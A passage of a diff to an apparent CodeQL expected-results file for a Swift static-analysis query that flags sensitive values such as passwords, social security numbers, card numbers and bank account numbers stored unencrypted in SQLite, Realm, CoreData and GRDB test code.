testGRDB.swift:198:29:198:38 | [...] | testGRDB.swift:198:30:198:30 | password | testGRDB.swift:198:29:198:38 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:198:30:198:30 | password | password | +| testGRDB.swift:201:23:201:32 | [...] | testGRDB.swift:201:24:201:24 | password | testGRDB.swift:201:23:201:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:201:24:201:24 | password | password | +| testGRDB.swift:206:66:206:75 | [...] | testGRDB.swift:206:67:206:67 | password | testGRDB.swift:206:66:206:75 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:206:67:206:67 | password | password | +| testGRDB.swift:208:80:208:89 | [...] | testGRDB.swift:208:81:208:81 | password | testGRDB.swift:208:80:208:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:208:81:208:81 | password | password | +| testGRDB.swift:210:84:210:93 | [...] | testGRDB.swift:210:85:210:85 | password | testGRDB.swift:210:84:210:93 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:210:85:210:85 | password | password | +| testGRDB.swift:212:98:212:107 | [...] | testGRDB.swift:212:99:212:99 | password | testGRDB.swift:212:98:212:107 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:212:99:212:99 | password | password | +| testRealm2.swift:18:2:18:2 | o | testRealm2.swift:18:11:18:11 | myPassword | testRealm2.swift:18:2:18:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:18:11:18:11 | myPassword | myPassword | +| testRealm2.swift:24:2:24:2 | o | testRealm2.swift:24:11:24:11 | socialSecurityNumber | testRealm2.swift:24:2:24:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:24:11:24:11 | socialSecurityNumber | socialSecurityNumber | +| testRealm2.swift:25:2:25:2 | o | testRealm2.swift:25:11:25:11 | ssn | testRealm2.swift:25:2:25:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:25:11:25:11 | ssn | ssn | +| testRealm2.swift:26:2:26:2 | o | testRealm2.swift:26:18:26:18 | ssn_int | testRealm2.swift:26:2:26:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:26:18:26:18 | ssn_int | ssn_int | +| testRealm2.swift:32:2:32:2 | o | testRealm2.swift:32:11:32:11 | creditCardNumber | testRealm2.swift:32:2:32:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:32:11:32:11 | creditCardNumber | creditCardNumber | +| testRealm2.swift:33:2:33:2 | o | testRealm2.swift:33:11:33:11 | CCN | testRealm2.swift:33:2:33:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:33:11:33:11 | CCN | CCN | +| testRealm2.swift:34:2:34:2 | o | testRealm2.swift:34:18:34:18 | int_ccn | testRealm2.swift:34:2:34:2 | [post] o | This operation stores 'o' in a database. It may contain unencrypted sensitive data from $@. | testRealm2.swift:34:18:34:18 | int_ccn | int_ccn | +| testRealm.swift:41:2:41:2 | a | testRealm.swift:41:11:41:11 | myPassword | testRealm.swift:41:2:41:2 | [post] a | This operation stores 'a' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:41:11:41:11 | myPassword | myPassword | +| testRealm.swift:49:2:49:2 | c | testRealm.swift:49:11:49:11 | myPassword | testRealm.swift:49:2:49:2 | [post] c | This operation stores 'c' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:49:11:49:11 | myPassword | myPassword | +| testRealm.swift:59:2:59:3 | ...! | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:59:2:59:3 | [post] ...! | This operation stores '...!' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:59:12:59:12 | myPassword | myPassword | +| testRealm.swift:66:2:66:2 | g | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:66:2:66:2 | [post] g | This operation stores 'g' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:66:11:66:11 | myPassword | myPassword | +| testRealm.swift:73:2:73:2 | h | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:73:2:73:2 | [post] h | This operation stores 'h' in a database. It may contain unencrypted sensitive data from $@. | testRealm.swift:73:15:73:15 | myPassword | myPassword | edges | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | provenance | | | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | provenance | | @@ -622,143 +762,3 @@ subpaths | testRealm.swift:59:12:59:12 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:59:2:59:3 | [post] ...! | | testRealm.swift:66:11:66:11 | myPassword | testRealm.swift:27:6:27:6 | value | testRealm.swift:27:6:27:6 | self [Return] [data] | testRealm.swift:66:2:66:2 | [post] g | | testRealm.swift:73:15:73:15 | myPassword | testRealm.swift:34:6:34:6 | value | testRealm.swift:34:6:34:6 | self [Return] [password] | testRealm.swift:73:2:73:2 | [post] h | -#select -| SQLite.swift:123:17:123:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:123:17:123:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:124:17:124:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:124:17:124:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:127:21:127:21 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:127:21:127:21 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:128:21:128:21 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:128:21:128:21 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:131:17:131:17 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:131:17:131:17 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:132:17:132:17 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:132:17:132:17 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:135:20:135:20 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:135:20:135:20 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:136:20:136:20 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:136:20:136:20 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:139:24:139:24 | insertQuery | SQLite.swift:119:70:119:70 | mobilePhoneNumber | SQLite.swift:139:24:139:24 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:119:70:119:70 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:140:24:140:24 | updateQuery | SQLite.swift:120:50:120:50 | mobilePhoneNumber | SQLite.swift:140:24:140:24 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:120:50:120:50 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:147:32:147:32 | [...] | SQLite.swift:147:32:147:32 | mobilePhoneNumber | SQLite.swift:147:32:147:32 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:147:32:147:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:148:28:148:28 | [...] | SQLite.swift:148:28:148:28 | mobilePhoneNumber | SQLite.swift:148:28:148:28 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:148:28:148:28 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:149:31:149:31 | [...] | SQLite.swift:149:31:149:31 | mobilePhoneNumber | SQLite.swift:149:31:149:31 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:149:31:149:31 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:152:21:152:21 | [...] | SQLite.swift:152:21:152:21 | mobilePhoneNumber | SQLite.swift:152:21:152:21 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:152:21:152:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:153:20:153:20 | [...] | SQLite.swift:153:20:153:20 | mobilePhoneNumber | SQLite.swift:153:20:153:20 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:153:20:153:20 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:154:23:154:23 | [...] | SQLite.swift:154:23:154:23 | mobilePhoneNumber | SQLite.swift:154:23:154:23 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:154:23:154:23 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:158:32:158:54 | [...] | SQLite.swift:158:33:158:33 | mobilePhoneNumber | SQLite.swift:158:32:158:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:158:33:158:33 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:159:28:159:50 | [...] | SQLite.swift:159:29:159:29 | mobilePhoneNumber | SQLite.swift:159:28:159:50 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:159:29:159:29 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:160:31:160:53 | [...] | SQLite.swift:160:32:160:32 | mobilePhoneNumber | SQLite.swift:160:31:160:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:160:32:160:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:163:21:163:43 | [...] | SQLite.swift:163:22:163:22 | mobilePhoneNumber | SQLite.swift:163:21:163:43 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:163:22:163:22 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:164:20:164:42 | [...] | SQLite.swift:164:21:164:21 | mobilePhoneNumber | SQLite.swift:164:20:164:42 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:164:21:164:21 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:165:23:165:45 | [...] | SQLite.swift:165:24:165:24 | mobilePhoneNumber | SQLite.swift:165:23:165:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:165:24:165:24 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:169:32:169:70 | [...] | SQLite.swift:169:53:169:53 | mobilePhoneNumber | SQLite.swift:169:32:169:70 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:169:53:169:53 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:170:28:170:66 | [...] | SQLite.swift:170:49:170:49 | mobilePhoneNumber | SQLite.swift:170:28:170:66 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:170:49:170:49 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:171:31:171:69 | [...] | SQLite.swift:171:52:171:52 | mobilePhoneNumber | SQLite.swift:171:31:171:69 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:171:52:171:52 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:174:21:174:59 | [...] | SQLite.swift:174:42:174:42 | mobilePhoneNumber | SQLite.swift:174:21:174:59 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:174:42:174:42 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:175:20:175:58 | [...] | SQLite.swift:175:41:175:41 | mobilePhoneNumber | SQLite.swift:175:20:175:58 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:175:41:175:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:176:23:176:61 | [...] | SQLite.swift:176:44:176:44 | mobilePhoneNumber | SQLite.swift:176:23:176:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:176:44:176:44 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:186:40:186:54 | [...] | SQLite.swift:186:54:186:54 | mobilePhoneNumber | SQLite.swift:186:40:186:54 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:186:54:186:54 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:189:26:189:40 | [...] | SQLite.swift:189:40:189:40 | mobilePhoneNumber | SQLite.swift:189:26:189:40 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:189:40:189:40 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:191:27:191:41 | [...] | SQLite.swift:191:41:191:41 | mobilePhoneNumber | SQLite.swift:191:27:191:41 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:191:41:191:41 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:193:26:193:89 | [...] | SQLite.swift:193:72:193:72 | mobilePhoneNumber | SQLite.swift:193:26:193:89 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:193:72:193:72 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:199:30:199:30 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:199:30:199:30 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| SQLite.swift:201:54:201:54 | badMany | SQLite.swift:197:32:197:32 | mobilePhoneNumber | SQLite.swift:201:54:201:54 | badMany | This operation stores 'badMany' in a database. It may contain unencrypted sensitive data from $@. | SQLite.swift:197:32:197:32 | mobilePhoneNumber | mobilePhoneNumber | -| sqlite3_c_api.swift:46:27:46:27 | insertQuery | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | sqlite3_c_api.swift:46:27:46:27 | insertQuery | This operation stores 'insertQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:42:69:42:69 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:47:27:47:27 | updateQuery | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | sqlite3_c_api.swift:47:27:47:27 | updateQuery | This operation stores 'updateQuery' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:43:49:43:49 | medicalNotes | medicalNotes | -| sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | This operation stores 'medicalNotes' in a database. It may contain unencrypted sensitive data from $@. | sqlite3_c_api.swift:58:36:58:36 | medicalNotes | medicalNotes | -| testCoreData2.swift:37:2:37:2 | obj | testCoreData2.swift:37:16:37:16 | bankAccountNo | testCoreData2.swift:37:2:37:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:37:16:37:16 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:39:2:39:2 | obj | testCoreData2.swift:39:28:39:28 | bankAccountNo | testCoreData2.swift:39:2:39:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:39:28:39:28 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:41:2:41:2 | obj | testCoreData2.swift:41:29:41:29 | bankAccountNo | testCoreData2.swift:41:2:41:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:41:29:41:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:43:2:43:2 | obj | testCoreData2.swift:43:35:43:35 | bankAccountNo | testCoreData2.swift:43:2:43:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:43:35:43:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:46:2:46:10 | ...? | testCoreData2.swift:46:22:46:22 | bankAccountNo | testCoreData2.swift:46:2:46:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:46:22:46:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:48:2:48:10 | ...? | testCoreData2.swift:48:34:48:34 | bankAccountNo | testCoreData2.swift:48:2:48:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:48:34:48:34 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:50:2:50:10 | ...? | testCoreData2.swift:50:35:50:35 | bankAccountNo | testCoreData2.swift:50:2:50:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:50:35:50:35 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:52:2:52:10 | ...? | testCoreData2.swift:52:41:52:41 | bankAccountNo | testCoreData2.swift:52:2:52:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:52:41:52:41 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:57:3:57:3 | obj | testCoreData2.swift:57:29:57:29 | bankAccountNo | testCoreData2.swift:57:3:57:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:57:29:57:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:60:4:60:4 | obj | testCoreData2.swift:60:30:60:30 | bankAccountNo | testCoreData2.swift:60:4:60:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:60:30:60:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:62:4:62:4 | obj | testCoreData2.swift:62:30:62:30 | bankAccountNo | testCoreData2.swift:62:4:62:4 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:62:30:62:30 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:65:3:65:3 | obj | testCoreData2.swift:65:29:65:29 | bankAccountNo | testCoreData2.swift:65:3:65:3 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:65:29:65:29 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:79:2:79:2 | dbObj | testCoreData2.swift:79:18:79:28 | .bankAccountNo | testCoreData2.swift:79:2:79:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:79:18:79:28 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:80:2:80:2 | dbObj | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | testCoreData2.swift:80:2:80:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:80:18:80:28 | .bankAccountNo2 | .bankAccountNo2 | -| testCoreData2.swift:82:2:82:2 | dbObj | testCoreData2.swift:82:18:82:18 | bankAccountNo | testCoreData2.swift:82:2:82:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:82:18:82:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:83:2:83:2 | dbObj | testCoreData2.swift:83:18:83:18 | bankAccountNo | testCoreData2.swift:83:2:83:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:83:18:83:18 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:84:2:84:2 | dbObj | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | testCoreData2.swift:84:2:84:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:84:18:84:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:85:2:85:2 | dbObj | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | testCoreData2.swift:85:2:85:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:85:18:85:18 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:87:2:87:10 | ...? | testCoreData2.swift:87:22:87:32 | .bankAccountNo | testCoreData2.swift:87:2:87:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:87:22:87:32 | .bankAccountNo | .bankAccountNo | -| testCoreData2.swift:88:2:88:10 | ...? | testCoreData2.swift:88:22:88:22 | bankAccountNo | testCoreData2.swift:88:2:88:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:88:22:88:22 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:89:2:89:10 | ...? | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | testCoreData2.swift:89:2:89:10 | [post] ...? | This operation stores '...?' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:89:22:89:22 | bankAccountNo2 | bankAccountNo2 | -| testCoreData2.swift:93:2:93:2 | dbObj | testCoreData2.swift:91:10:91:10 | bankAccountNo | testCoreData2.swift:93:2:93:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:91:10:91:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:98:2:98:2 | dbObj | testCoreData2.swift:95:10:95:10 | bankAccountNo | testCoreData2.swift:98:2:98:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:95:10:95:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:104:2:104:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:104:2:104:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData2.swift:105:2:105:2 | dbObj | testCoreData2.swift:101:10:101:10 | bankAccountNo | testCoreData2.swift:105:2:105:2 | [post] dbObj | This operation stores 'dbObj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData2.swift:101:10:101:10 | bankAccountNo | bankAccountNo | -| testCoreData.swift:19:12:19:12 | value | testCoreData.swift:61:25:61:25 | password | testCoreData.swift:19:12:19:12 | value | This operation stores 'value' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:61:25:61:25 | password | password | -| testCoreData.swift:32:13:32:13 | newValue | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:32:13:32:13 | newValue | This operation stores 'newValue' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | testCoreData.swift:48:15:48:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:48:15:48:15 | password | password | -| testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | testCoreData.swift:51:24:51:24 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:51:24:51:24 | password | password | -| testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | testCoreData.swift:58:15:58:15 | password | This operation stores 'password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:58:15:58:15 | password | password | -| testCoreData.swift:64:2:64:2 | obj | testCoreData.swift:64:16:64:16 | password | testCoreData.swift:64:2:64:2 | [post] obj | This operation stores 'obj' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:64:16:64:16 | password | password | -| testCoreData.swift:78:15:78:15 | x | testCoreData.swift:77:24:77:24 | x | testCoreData.swift:78:15:78:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:77:24:77:24 | x | x | -| testCoreData.swift:81:15:81:15 | y | testCoreData.swift:80:10:80:22 | call to getPassword() | testCoreData.swift:81:15:81:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:80:10:80:22 | call to getPassword() | call to getPassword() | -| testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | testCoreData.swift:85:15:85:17 | .password | This operation stores '.password' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:85:15:85:17 | .password | .password | -| testCoreData.swift:95:15:95:15 | x | testCoreData.swift:91:10:91:10 | passwd | testCoreData.swift:95:15:95:15 | x | This operation stores 'x' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:91:10:91:10 | passwd | passwd | -| testCoreData.swift:96:15:96:15 | y | testCoreData.swift:92:10:92:10 | passwd | testCoreData.swift:96:15:96:15 | y | This operation stores 'y' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:92:10:92:10 | passwd | passwd | -| testCoreData.swift:97:15:97:15 | z | testCoreData.swift:93:10:93:10 | passwd | testCoreData.swift:97:15:97:15 | z | This operation stores 'z' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:93:10:93:10 | passwd | passwd | -| testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | This operation stores 'call to generateSecretKey()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:128:15:128:33 | call to generateSecretKey() | call to generateSecretKey() | -| testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | testCoreData.swift:129:15:129:30 | call to getCertificate() | This operation stores 'call to getCertificate()' in a database. It may contain unencrypted sensitive data from $@. | testCoreData.swift:129:15:129:30 | call to getCertificate() | call to getCertificate() | -| testGRDB.swift:73:56:73:65 | [...] | testGRDB.swift:73:57:73:57 | password | testGRDB.swift:73:56:73:65 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:73:57:73:57 | password | password | -| testGRDB.swift:76:42:76:51 | [...] | testGRDB.swift:76:43:76:43 | password | testGRDB.swift:76:42:76:51 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:76:43:76:43 | password | password | -| testGRDB.swift:81:44:81:53 | [...] | testGRDB.swift:81:45:81:45 | password | testGRDB.swift:81:44:81:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:81:45:81:45 | password | password | -| testGRDB.swift:83:44:83:53 | [...] | testGRDB.swift:83:45:83:45 | password | testGRDB.swift:83:44:83:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:83:45:83:45 | password | password | -| testGRDB.swift:85:44:85:53 | [...] | testGRDB.swift:85:45:85:45 | password | testGRDB.swift:85:44:85:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:85:45:85:45 | password | password | -| testGRDB.swift:87:44:87:53 | [...] | testGRDB.swift:87:45:87:45 | password | testGRDB.swift:87:44:87:53 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:87:45:87:45 | password | password | -| testGRDB.swift:92:37:92:46 | [...] | testGRDB.swift:92:38:92:38 | password | testGRDB.swift:92:37:92:46 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:92:38:92:38 | password | password | -| testGRDB.swift:95:36:95:45 | [...] | testGRDB.swift:95:37:95:37 | password | testGRDB.swift:95:36:95:45 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:95:37:95:37 | password | password | -| testGRDB.swift:100:72:100:81 | [...] | testGRDB.swift:100:73:100:73 | password | testGRDB.swift:100:72:100:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:100:73:100:73 | password | password | -| testGRDB.swift:101:72:101:81 | [...] | testGRDB.swift:101:73:101:73 | password | testGRDB.swift:101:72:101:81 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:101:73:101:73 | password | password | -| testGRDB.swift:107:52:107:61 | [...] | testGRDB.swift:107:53:107:53 | password | testGRDB.swift:107:52:107:61 | [...] | This operation stores '[...]' in a database. It may contain unencrypted sensitive data from $@. | testGRDB.swift:107:53:107:53 | password | password | -| testGRDB.swift:109:52:109:61 | [...] | testGRDB.swift:109:53:109:53 | password | testGRDB.swift:109:52:109:61 | [...] | This 